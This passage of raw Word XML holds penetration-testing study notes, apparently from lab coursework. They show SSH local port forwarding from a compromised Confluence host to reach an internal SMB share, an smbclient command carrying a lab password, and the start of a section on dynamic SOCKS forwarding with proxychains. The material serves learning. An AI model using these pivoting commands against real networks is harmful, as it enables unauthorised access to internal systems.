    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000842">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most of the connections time out, suggesting that there's nothing there. In contrast, we'll notice that PGDATABASE01 (at 172.16.50.215) actively refused the connection. We also find that there is a host on the subnet, which has TCP port 445 open: 172.16.50.217!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000843">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We want to be able to enumerate the SMB service on this host. If we find anything, we want to download it directly to our Kali machine for inspection. There are at least two ways we could do this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000844">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we know target machine IP, we want to be able to directly access that machine from our Kali. We can port forward with SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000845">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bpj5kd8mcctw" w:id="74"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Port Forwarding using SSH</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A local port forward can be set up using OpenSSH’s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which takes a forwarding rule in the format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000848">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOCAL_IP:]LOCAL_PORT:DEST_IP:DEST_PORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000849">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first part "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LOCAL_IP:LOCAL_PORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">defines the listening socket on the SSH client — where packets will enter the tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second part "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DEST_IP:DEST_PORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" defines the destination socket on the SSH server side — where packets will be forwarded to after tunneling.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, we will instruct SSH to listen on all interfaces on port 4455 on CONFLUENCE01 (0.0.0.0:4455), then forward all packets (through the SSH tunnel to PGDATABASE01) to port 445 on the newly found host (172.16.50.217:445).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000850">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: We're listening on port 4455 on CONFLUENCE01 because we're running as the confluence user: we don't have the permissions to listen on any port below 1024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000851">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll pass the local port forwarding argument we just put together to -L, and use -N to prevent a shell from being opened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000852">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000853">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we've entered the password, we don't receive any output. When running SSH with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag, this is normal. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag prevents SSH from executing any remote commands, meaning we will only receive output related to our port forward.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000854">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000855">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Info:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the SSH connection or the port forwarding fails for some reason, and the output we get from the standard SSH session isn't sufficient to troubleshoot it, we can pass the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag to ssh in order to receive debug output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000856">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000857">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to see that it's listening on port 4455 and accepting any IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000858">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2844800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="84" name="image68.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image68.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183"/>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859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000085A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000085B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000085C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can directly interact with port 445 (SMB) of the target machine from our kali. But, we specify the port and IP of CONFLUENCE01</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000085F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4455 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since that's the listening port of CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000860">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.63 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since that's IP of CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000861">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008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3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ra7gcji5lwnw" w:id="75"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Dynamic Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000864">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000865">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: In a complex situation with Kali, JUMP1, JUMP2, and Target, we set up SSH client on JUMP1 and SSH Server on JUMP2. And the SSH client has SOCKS5 PROXY, which we connect to from our Kali using proxychains. This makes it so that anytime we use the proxychains command, it gets sent to the proxy, which gets SSH tunneled to JUMP2. And then the end result is being able to write commands from our kali as if we are JUMP2, so we specify the IP and Port of Target directly. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000866">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We no longer are no longer writing the IP and Port of the SSH client, as we did before, like in SSH Local Port Forwarding</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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000086A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has one glaring limitation: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we can only connect to one socket </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">per SSH connection. Luckily, OpenSSH also provides </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic port forwarding.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> From a single listening port on the SSH client, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">packets can be forwarded to any socket that the SSH server host has access to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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH dynamic port forwarding works because the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the SSH client creates is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy server port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. SOCKS is a proxying protocol. Much like a postal service, a SOCKS server accepts packets (with a SOCKS protocol header) and forwards them on to wherever they're addressed.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000086D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The forwarding behavior here isn’t automatic or "magic" —it works because client tools like Proxychains wrap outbound connections in SOCKS protocol headers. These headers tell the SOCKS server (in this case, OpenSSH) where to send the traffic. Without them, the server can’t forward the packets correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000086E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000086F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The only limitation</w:t>
      </w:r>
